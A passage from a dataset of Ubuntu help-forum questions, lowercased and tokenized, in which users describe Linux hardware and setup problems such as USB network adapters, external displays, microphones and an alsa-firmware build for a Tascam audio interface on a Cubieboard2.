micro seconds bu2devexitlat 101 micro seconds device status : 0x000c ( bus powered ) u1 enabled u2 enabled unlike in this question the device is not being recognized as an ethernet device any more . here 's the relevant output of dmseg : dmesg | grep asix [ 3.238120 ] usb 4-2 : manufacturer : asix elec . corp. [ 61.907446 ] usb 4-2 : manufacturer : asix elec . corp. [ 84.772115 ] usb 4-1 : manufacturer : asix elec . corp. [ 192.615236 ] usb 4-2 : manufacturer : asix elec . corp. [ 1146.200351 ] usb 4-2 : manufacturer : asix elec . corp. dmesg | grep ax88179 [ 3.238119 ] usb 4-2 : product : ax88179 [ 61.907444 ] usb 4-2 : product : ax88179 [ 84.772110 ] usb 4-1 : product : ax88179 [ 192.615231 ] usb 4-2 : product : ax88179 [ 1146.200346 ] usb 4-2 : product : ax88179 the driver is not installed after the upgrade as far as i know .
376866	unable to mount internet manager zte mf-195 usb wireless modem	i just got this zte mf-195 usb wireless modem , and when i plug it in i get this message : unable to mount internet manager error mounting : mount : /dev/sr0 already mounted or /media/internet manager busy the results of running lsusb are : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 147e:2016 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 004 : id 04f2 : b25f chicony electronics co. , ltd bus 001 device 005 : id 0a5c:217f broadcom corp. bluetooth controller bus 003 device 005 : id 19d2:1514 zte wcdma technologies msm x1 : ~ $ dmesg | grep tty [ 0.000000 ] console [ tty0 ] enabled [ 1.019341 ] 0000:00:16.3 : ttys4 at i/o 0x50b0 ( irq = 19 ) is a 16550a ... so my device is bus 003 device 005 : id 19d2:1514 zte wcdma technologies msm . what should i do ?
376870	12.04 lts - second display not always recognized	i use 12.04.3 ( 64 bit ) on an asus zenbook prime ( - > info ) with an intel hd 3000 video card : uname -a linux maroubra 3.8.0-33-generic # 48~precise1-ubuntu smp thu oct 24 16:28:06 utc 2013 x86_64 x86_64 x86_64 gnu/linux lspci -v 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : asustek computer inc. zenbook prime ux31a flags : bus master , fast devsel , latency 0 , irq 44 memory at f7800000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 the problem is that after boot and wake up the second display wo n't always be recognized . the computer boots / wakes up just fine , but after login / password screen the second display will either work or not . if it works i get the following output on xrandr : xrandr screen 0 : minimum 320 x 200 , current 3840 x 1080 , maximum 32767 x 32767 edp1 connected 1920x1080+1920+0 ( normal left inverted right x axis y axis ) 282mm x 165mm 1920x1080 60.0*+ 59.9 40.0 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 531mm x 299mm 1920x1080 60.0*+ 50.0 1680x1050 59.9 1600x900 60.0 1280x1024 75.0 60.0 1440x900 59.9 1280x800 59.9 1152x864 75.0 1280x720 50.0 60.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 720x576 50.0 720x480 59.9 640x480 72.8 75.0 66.7 60.0 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) it it 's not working xrandr looks like this : xrandr screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 32767 x 32767 edp1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 282mm x 165mm 1920x1080 60.0*+ 59.9 40.0 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) i can 'fix ' this by re-connecting the hdmi cable , which will usually make ubuntu recognize the second screen ( might need a few attempts though ) . this not only is very annoying but also starts to wear out the ( mini- ) hdmi connection on my laptop ( i must have done this about a million times in the last year ) . i should add that i 'm observing this behavior over a year on quite a few distros ( linux mint , ubuntu 12.04 / 12.10 / 13.10 ) and kernels . i 've never paid much attention to setting up dual displays so far - which makes it pretty vanilla in this regards . intel provides linux drivers for hd 3000 , but they do n't support 12.04 any more , and most information i find seems to indicate that special drivers should n't be required .
376871	xubuntu internet not working after installation	i just installed xubuntu 12.04lts . my internet works , just tested it on a live cd . but when i start up into xubuntu , the first message i get is `` connection lost - you are no longer connected to the internet '' . i 've tried to set the connection manually , but it does n't have any effect ; there doesnt even seem refresh on connection . what can be the problem ?
376876	microphone doesnt work in macbook pro 13	am new to ubuntu and i have somehow installed ubuntu 12.04 lts on my macbook pro 13 '' ( macbookpro7,1 ) . i need two things , a ) my internal /external microphone doesnt work . i tried with alsamixer , but it doesnt work . please help to fix the issue . b ) while installing , i havent created the swap space . please let me know how to create the swap space . thanks in advance . am waiting for the reply
376877	kubuntu fails to mount ntfs on startup , then succeeds but it 's too late	i 'm using kubuntu 13.04 x64 , i 'm a complete noob at linux and kubuntu and have never asked a question on here before , and i have a ntfs partition on my hdd that is shared with a windows 8.1 partition as a data drive . when i set my path variables to my home folder directory to the partition , it works perfectly , also dropbox is set to use the drive as well and this also works perfectly . however , when i reboot my system , the paths reset to my linux partition and dropbox fails to access the partition . when the system has completely finished starting up , i can reset both the paths and dropbox again to it without any problems . is there some way to make kubuntu mount the partition at the same time as it mounts it 's own partition so i do n't have to do this manually everytime i boot up ? thanks for your help !
376878	screen hanging problem after software updates	after i installed software updates , when i log in and open terminal or anyting and move it with cursor the screen will have replica of the terminal like a trace of the terminal . then the terminal wo n't close . i do n't know what is this but please help me out . this happened after i installed the updates .
376880	streaming media to wiimc	i have spent a couple of days at this issue , and i 'm seething in frustration . i am trying to stream my movies/music to my wii console . when i had windows , this was all too simple : create a profile with username and pass , know your ip , and select directories to share . now i tried something similar to this with samba , but it just does n't work . i tried everything . i tried a few tutorials which ended up making ubuntu freeze and refuse to boot ( re-install ) . i also tried seriio , which i could n't get to work after numerous tutorials . finally i tried vlc with vlc-shares . i had some success . i got it to run , but it will only let me stream from /root not expansion drive : ( . i tried to put a movie on my ssd and it did n't work anyway . i am at a total loss as what to do now . i am by no means a total newbie at networking , just new to linux . i would appreciate it greatly if someone could guide me in the right direction .
376882	ubuntu 13.10 no launcher and no dash appears	i 've the same issue in the question here . unity does n't load , no launcher , no dash appears launcher and panel missing [ ubuntu 13.04 ] it might be a duplicate question . but none of these answers work in ubuntu 13.10 do anyone have any ideas to fix this issue in 13.10 ? i ca n't do anything with my computer now ... thanks for helping
376883	ubuntu 13.10 dual monitor freezing	just curious if any other users have experienced any issues with a multiple-screen setup . i 've experienced frequent freezing , especially when attempting to minimize a window that 's on the right-hand screen and it freezes or 'gets stuck ' in the centre . i do n't recall having such issues with 13.04 . it 's also worth noting that the right-hand monitor will lose input randomly , replugging the monitor does n't work and the only thing that seems to get the image back is to reboot the system . anyone know of a way to resolve this or is it just a bug in 13.10 ?
376884	eclipse , error opening help pages	i 'm getting this error message : could not open the browser because none are configured , check the web browser preference eclipse version : 3.3.2 ( cdt ) build id : m20080221-1800 - ubuntu 12.04 lts it appears when i go to the menu help - > help contents also when accessing tutorials on the welcome to eclipse-page .
376885	lubuntu on cubieboard2 . alsa-firmware not installing usx2yloader into /usr/bin or /sbin . very stumped !	i am combining an usb sound card with a cubieboard2 , within a head casing containing two microphones ! binaural microphone ! thats just the basic jist at least ; p i am currently using lubuntu 12.10 v1.05 a20 nand image . my goal here is to load alsa-firmware into a tascam us122 usb audio interface ( test unit ) while we wait for our own designed sound card to be completed ! i am specifically having an issue with usx2yloader within alsa-firmware . at least i think that is the problem ! this same process worked perfect on my desktop ubuntu install . i am following this guide tascam us122 ubuntu community . the guide is slightly old , as far as the old firmware and link go , but i have worked out that problem already . remember this is all using lubuntu cubieboard2 a20 image ! this is not i386 compatible ! armhf please =d so ... after i run this command , with the proper paths , the firmware loads into the tascam . $ sudo fxload -s /path/to/ld2-ezusb.hex -i /usr/share/alsa/firmware/usx2yloader/us122fw.ihx -d /proc/bus/usb/002/003 after this i am supposed to run usx2yloader but i get this error . $ sudo usx2yloader sudo : usx2yloader : command not found i know this looks like a simple fix but it is a lot harder than i could have forseen ! as far as i know , you cant just simply install or sudo apt-get install usx2yloader . i have tried to just extract alsa-firmare , cd /usx2yloader and make doesnt work . $ make make : nothing to be done for `all ' . i will install alsa-firmware now and give you the output . please keep in mind that my alsa install is currently 1.0.25 so i normally would get the alsa-firmware that matches it . note : i have tried several different alfa-firmware packages such as 1.0.27 ( current ) , 1.0.25 ( same as my lubuntu installed alsa and alsa-tools ) and 1.0.16 ( the same as my ubuntu desktop install , which was successfull and the tascam is currently on with a solid green light ) . for examples sake , i will install 1.0.27 ( current ) configure linaro @ cubieboard2 : ~/downloads/alsa-firmware-1.0.27 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking whether ln -s works ... yes checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for as31 ... no checking firmware installation directory ... /lib/firmware checking that generated files are newer than configure ... done configure : creating ./config.status config.status : creating makefile config.status : creating hdsploader/makefile config.status : creating mixartloader/makefile config.status : creating usx2yloader/makefile config.status : creating vxloader/makefile config.status : creating pcxhrloader/makefile config.status : creating echoaudio/makefile config.status : creating emu/makefile config.status : creating asihpi/makefile config.status : creating korg1212/makefile config.status : creating maestro3/makefile config.status : creating multisound/makefile config.status : creating sb16/makefile config.status : creating wavefront/makefile config.status : creating ymfpci/makefile config.status : creating aica/makefile config.status : creating ca0132/makefile config.status : executing depfiles commands make linaro @ cubieboard2 : ~/downloads/alsa-firmware-1.0.27 $ make making all in hdsploader make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/hdsploader' gcc -dpackage_name=\ '' \ '' -dpackage_tarname=\ '' \ '' -dpackage_version=\ '' \ '' - dpackage_string=\ '' \ '' -dpackage_bugreport=\ '' \ '' -dpackage_url=\ '' \ '' -dpackage=\ '' alsa- firmware\ '' -dversion=\ '' 1.0.27\ '' -dstdc_headers=1 -i . -g -o2 -mt tobin.o -md -mp -mf .deps/tobin.tpo -c -o tobin.o tobin.c mv -f .deps/tobin.tpo .deps/tobin.po gcc -g -o2 -o tobin tobin.o ./tobin make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/hdsploader' making all in mixartloader make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/mixartloader' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/mixartloader' making all in pcxhrloader make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/pcxhrloader' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/pcxhrloader' making all in usx2yloader make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader' making all in vxloader make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/vxloader' gcc -dpackage_name=\ '' \ '' -dpackage_tarname=\ '' \ '' -dpackage_version=\ '' \ '' -dpackage_string=\ '' \ '' -dpackage_bugreport=\ '' \ '' -dpackage_url=\ '' \ '' -dpackage=\ '' alsa-firmware\ '' -dversion=\ '' 1.0.27\ '' -dstdc_headers=1 -i . -g -o2 -mt toxlx.o -md -mp -mf .deps/toxlx.tpo -c -o toxlx.o toxlx.c mv -f .deps/toxlx.tpo .deps/toxlx.po gcc -g -o2 -o toxlx toxlx.o ./toxlx < x1_2_v22.rbt > x1_2_v22.xlx ./toxlx < x1_1_vx2.rbt > x1_1_vx2.xlx ./toxlx < x1_1_vxp.rbt > x1_1_vxp.xlx ./toxlx < x1_1_vp4.rbt > x1_1_vp4.xlx make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/vxloader' making all in echoaudio make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/echoaudio' gcc -dpackage_name=\ '' \ '' -dpackage_tarname=\ '' \ '' -dpackage_version=\ '' \ '' - dpackage_string=\ '' \ '' -dpackage_bugreport=\ '' \ '' -dpackage_url=\ '' \ '' -dpackage=\ '' alsa- firmware\ '' -dversion=\ '' 1.0.27\ '' -dstdc_headers=1 -i . -g -o2 -mt fw_writer.o -md -mp - mf .deps/fw_writer.tpo -c -o fw_writer.o fw_writer.c mv -f .deps/fw_writer.tpo .deps/fw_writer.po gcc -g -o2 -o fw_writer fw_writer.o ./fw_writer dsp/loaderdsp.c loader_dsp.fw ./fw_writer dsp/darla20dsp.c darla20_dsp.fw ./fw_writer dsp/gina20dsp.c gina20_dsp.fw ./fw_writer dsp/layla20dsp.c layla20_dsp.fw ./fw_writer asic/laylaasic.c layla20_asic.fw ./fw_writer dsp/darla24dsp.c darla24_dsp.fw ./fw_writer dsp/gina24dsp.c gina24_301_dsp.fw ./fw_writer asic/gina24asic.c gina24_301_asic.fw ./fw_writer dsp/gina24_361dsp.c gina24_361_dsp.fw ./fw_writer asic/gina24asic_361.c gina24_361_asic.fw ./fw_writer dsp/layla24dsp.c layla24_dsp.fw ./fw_writer asic/layla24_1asic.c layla24_1_asic.fw ./fw_writer asic/layla24_2a_asic.c layla24_2a_asic.fw ./fw_writer asic/layla24_2s_asic.c layla24_2s_asic.fw ./fw_writer dsp/monadsp.c mona_301_dsp.fw ./fw_writer asic/mona1asic48.c mona_301_1_asic_48.fw ./fw_writer asic/mona1asic96.c mona_301_1_asic_96.fw ./fw_writer dsp/mona361dsp.c mona_361_dsp.fw ./fw_writer asic/mona1asic48_361.c mona_361_1_asic_48.fw ./fw_writer asic/mona1asic96_361.c mona_361_1_asic_96.fw ./fw_writer asic/mona2asic.c mona_2_asic.fw ./fw_writer dsp/miadsp.c mia_dsp.fw ./fw_writer dsp/echo3gdsp.c echo3g_dsp.fw ./fw_writer asic/3g_asic.c 3g_asic.fw ./fw_writer dsp/indigodsp.c indigo_dsp.fw ./fw_writer dsp/indigoiodsp.c indigo_io_dsp.fw ./fw_writer dsp/indigoioxdsp.c indigo_iox_dsp.fw ./fw_writer dsp/indigodjdsp.c indigo_dj_dsp.fw ./fw_writer dsp/indigodjxdsp.c indigo_djx_dsp.fw make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/echoaudio' making all in asihpi make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/asihpi' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/asihpi' making all in emu make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/emu' gcc -dpackage_name=\ '' \ '' -dpackage_tarname=\ '' \ '' -dpackage_version=\ '' \ '' - dpackage_string=\ '' \ '' -dpackage_bugreport=\ '' \ '' -dpackage_url=\ '' \ '' -dpackage=\ '' alsa- firmware\ '' -dversion=\ '' 1.0.27\ '' -dstdc_headers=1 -i . -g -o2 -mt fw_writer.o -md -mp - mf .deps/fw_writer.tpo -c -o fw_writer.o fw_writer.c mv -f .deps/fw_writer.tpo .deps/fw_writer.po gcc -g -o2 -o fw_writer fw_writer.o ./fw_writer make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/emu' making all in korg1212 make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/korg1212' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/korg1212' making all in maestro3 make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/maestro3' gcc -dpackage_name=\ '' \ '' -dpackage_tarname=\ '' \ '' -dpackage_version=\ '' \ '' - dpackage_string=\ '' \ '' -dpackage_bugreport=\ '' \ '' -dpackage_url=\ '' \ '' -dpackage=\ '' alsa- firmware\ '' -dversion=\ '' 1.0.27\ '' -dstdc_headers=1 -i . -g -o2 -mt fw_writer.o -md -mp - mf .deps/fw_writer.tpo -c -o fw_writer.o fw_writer.c mv -f .deps/fw_writer.tpo .deps/fw_writer.po gcc -g -o2 -o fw_writer fw_writer.o ./fw_writer writing maestro3_assp_kernel.fw ... writing maestro3_assp_minisrc.fw ... make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/maestro3' making all in multisound make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/multisound' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/multisound' making all in sb16 make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/sb16' gcc -dpackage_name=\ '' \ '' -dpackage_tarname=\ '' \ '' -dpackage_version=\ '' \ '' - dpackage_string=\ '' \ '' -dpackage_bugreport=\ '' \ '' -dpackage_url=\ '' \ '' -dpackage=\ '' alsa- firmware\ '' -dversion=\ '' 1.0.27\ '' -dstdc_headers=1 -i . -g -o2 -mt fw_writer.o -md -mp - mf .deps/fw_writer.tpo -c -o fw_writer.o fw_writer.c mv -f .deps/fw_writer.tpo .deps/fw_writer.po gcc -g -o2 -o fw_writer fw_writer.o ./fw_writer writing mulaw_main.csp ... writing alaw_main.csp ... writing ima_adpcm_init.csp ... writing ima_adpcm_playback.csp ... writing ima_adpcm_capture.csp ... make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/sb16' making all in wavefront make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/wavefront' gcc -dpackage_name=\ '' \ '' -dpackage_tarname=\ '' \ '' -dpackage_version=\ '' \ '' - dpackage_string=\ '' \ '' -dpackage_bugreport=\ '' \ '' -dpackage_url=\ '' \ '' -dpackage=\ '' alsa- firmware\ '' -dversion=\ '' 1.0.27\ '' -dstdc_headers=1 -i . -g -o2 -mt fw_writer.o -md -mp - mf .deps/fw_writer.tpo -c -o fw_writer.o fw_writer.c mv -f .deps/fw_writer.tpo .deps/fw_writer.po gcc -g -o2 -o fw_writer fw_writer.o ./fw_writer writing yss225_registers.bin ... make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware- 1.0.27/wavefront' making all in ymfpci make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/ymfpci' gcc -dpackage_name=\ '' \ '' -dpackage_tarname=\ '' \ '' -dpackage_version=\ '' \ '' - dpackage_string=\ '' \ '' -dpackage_bugreport=\ '' \ '' -dpackage_url=\ '' \ '' -dpackage=\ '' alsa- firmware\ '' -dversion=\ '' 1.0.27\ '' -dstdc_headers=1 -i . -g -o2 -mt fw_writer.o -md -mp - mf .deps/fw_writer.tpo -c -o fw_writer.o fw_writer.c mv -f .deps/fw_writer.tpo .deps/fw_writer.po gcc -g -o2 -o fw_writer fw_writer.o ./fw_writer writing ds1_dsp.fw ... writing ds1_ctrl.fw ... writing ds1e_ctrl.fw ... make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/ymfpci' making all in aica make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/aica' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/aica' making all in ca0132 make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/ca0132' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/ca0132' make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27' make [ 1 ] : nothing to be done for `all-am ' . make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27' i noticed this line when doing make above . this should be installing right ? i think this is where my problem lies ... ! making all in usx2yloader make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader' make [ 1 ] : nothing to be done for `all ' . make install linaro @ cubieboard2 : ~/downloads/alsa-firmware-1.0.27 $ sudo make install making install in hdsploader make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/hdsploader' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/hdsploader' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/usr/local/share/alsa/firmware/hdsploader' /usr/bin/install -c -m 644 digiface_firmware.bin digiface_firmware_rev11.bin multiface_firmware.bin multiface_firmware_rev11.bin rpm_firmware.bin '/usr/local/share/alsa/firmware/hdsploader' /bin/mkdir -p '/lib/firmware' /usr/bin/install -c -m 644 digiface_firmware.bin digiface_firmware_rev11.bin multiface_firmware.bin multiface_firmware_rev11.bin rpm_firmware.bin '/lib/firmware' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/hdsploader' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/hdsploader' making install in mixartloader make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware- 1.0.27/mixartloader' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware- 1.0.27/mixartloader' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/usr/local/share/alsa/firmware/mixartloader' /usr/bin/install -c -m 644 mixart.conf mixart8aes.xlx mixart8.elf mixart8.xlx '/usr/local/share/alsa/firmware/mixartloader' /bin/mkdir -p '/lib/firmware/mixart' /usr/bin/install -c -m 644 mixart8aes.xlx mixart8.elf mixart8.xlx '/lib/firmware/mixart' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/mixartloader' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/mixartloader' making install in pcxhrloader make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/pcxhrloader' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/pcxhrloader' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/usr/local/share/alsa/firmware/pcxhrloader' /usr/bin/install -c -m 644 pcxhr.conf pcxhr0.conf pcxhr1.conf pcxhr2.conf pcxhr3.conf pcxhr4.conf pcxhr5.conf xi_1_882.dat xc_1_882.dat e321_512.e56 b321_512.b56 d321_512.d56 xlxint.dat xlxc882hr.dat xlxc882e.dat dspe882.e56 dspb882hr.b56 dspb882e.b56 dspd882.d56 xlxc1222hr.dat xlxc1222e.dat dspb1222hr.b56 dspb1222e.b56 dspd1222.d56 xlxc222.dat xlxc924.dat dspe924.e56 dspb924.b56 dspd222.d56 '/usr/local/share/alsa/firmware/pcxhrloader' /bin/mkdir -p '/lib/firmware/pcxhr' /usr/bin/install -c -m 644 xi_1_882.dat xc_1_882.dat e321_512.e56 b321_512.b56 d321_512.d56 xlxint.dat xlxc882hr.dat xlxc882e.dat dspe882.e56 dspb882hr.b56 dspb882e.b56 dspd882.d56 xlxc1222hr.dat xlxc1222e.dat dspb1222hr.b56 dspb1222e.b56 dspd1222.d56 xlxc222.dat xlxc924.dat dspe924.e56 dspb924.b56 dspd222.d56 '/lib/firmware/pcxhr' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/pcxhrloader' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/pcxhrloader' making install in usx2yloader make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader' /bin/mkdir -p '/usr/local/share/alsa/firmware/usx2yloader' /usr/bin/install -c -m 644 us122.conf us224.conf us428.conf us122.prepad us224.prepad us428.prepad us122.rbt us224.rbt us428.rbt tascam_loader.ihx us122fw.ihx us224fw.ihx us428fw.ihx '/usr/local/share/alsa/firmware/usx2yloader' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/usx2yloader' making install in vxloader make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/vxloader' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/vxloader' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/usr/local/share/alsa/firmware/vxloader' /usr/bin/install -c -m 644 vx222.conf vxboard.conf vxpocket.conf vxp440.conf bd56002.boot bd563s3.boot bd563v2.boot bx_1_vxp.b56 bx_1_vp4.b56 l_1_v22.d56 l_1_vx2.d56 l_1_vxp.d56 l_1_vp4.d56 x1_2_v22.rbt x1_1_vx2.rbt x1_1_vxp.rbt x1_1_vp4.rbt '/usr/local/share/alsa/firmware/vxloader' /bin/mkdir -p '/lib/firmware/vx' /usr/bin/install -c -m 644 bd56002.boot bd563s3.boot bd563v2.boot bx_1_vxp.b56 bx_1_vp4.b56 l_1_v22.d56 l_1_vx2.d56 l_1_vxp.d56 l_1_vp4.d56 x1_2_v22.xlx x1_1_vx2.xlx x1_1_vxp.xlx x1_1_vp4.xlx '/lib/firmware/vx' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/vxloader' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/vxloader' making install in echoaudio make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/echoaudio' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/echoaudio' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/lib/firmware/ea' /usr/bin/install -c -m 644 loader_dsp.fw darla20_dsp.fw gina20_dsp.fw layla20_dsp.fw layla20_asic.fw darla24_dsp.fw gina24_301_dsp.fw gina24_301_asic.fw gina24_361_dsp.fw gina24_361_asic.fw layla24_dsp.fw layla24_1_asic.fw layla24_2a_asic.fw layla24_2s_asic.fw mona_301_dsp.fw mona_301_1_asic_48.fw mona_301_1_asic_96.fw mona_361_dsp.fw mona_361_1_asic_48.fw mona_361_1_asic_96.fw mona_2_asic.fw mia_dsp.fw echo3g_dsp.fw 3g_asic.fw indigo_dsp.fw indigo_io_dsp.fw indigo_iox_dsp.fw indigo_dj_dsp.fw indigo_djx_dsp.fw '/lib/firmware/ea' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/echoaudio' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/echoaudio' making install in asihpi make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/asihpi' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/asihpi' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/lib/firmware/asihpi' /usr/bin/install -c -m 644 dsp2400.bin dsp5000.bin dsp6200.bin dsp6205.bin dsp6400.bin dsp6600.bin dsp8700.bin dsp8900.bin '/lib/firmware/asihpi' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/asihpi' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/asihpi' making install in emu make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/emu' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/emu' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/lib/firmware/emu' /usr/bin/install -c -m 644 hana.fw audio_dock.fw emu0404.fw micro_dock.fw emu1010_notebook.fw emu1010b.fw '/lib/firmware/emu' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/emu' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/emu' making install in korg1212 make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/korg1212' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/korg1212' make [ 2 ] : nothing to be done for `install-exec-am ' . /bin/mkdir -p '/lib/firmware/korg' /usr/bin/install -c -m 644 k1212.dsp '/lib/firmware/korg' make [ 2 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/korg1212' make [ 1 ] : leaving directory `/home/linaro/downloads/alsa-firmware-1.0.27/korg1212' making install in maestro3 make [ 1 ] : entering directory `/home/linaro/downloads/alsa-firmware-1.0.27/maestro3' make [ 2 ] : entering directory `/home/linaro/downloads/alsa-firmware- 1.0.27/maestro3' make [ 2 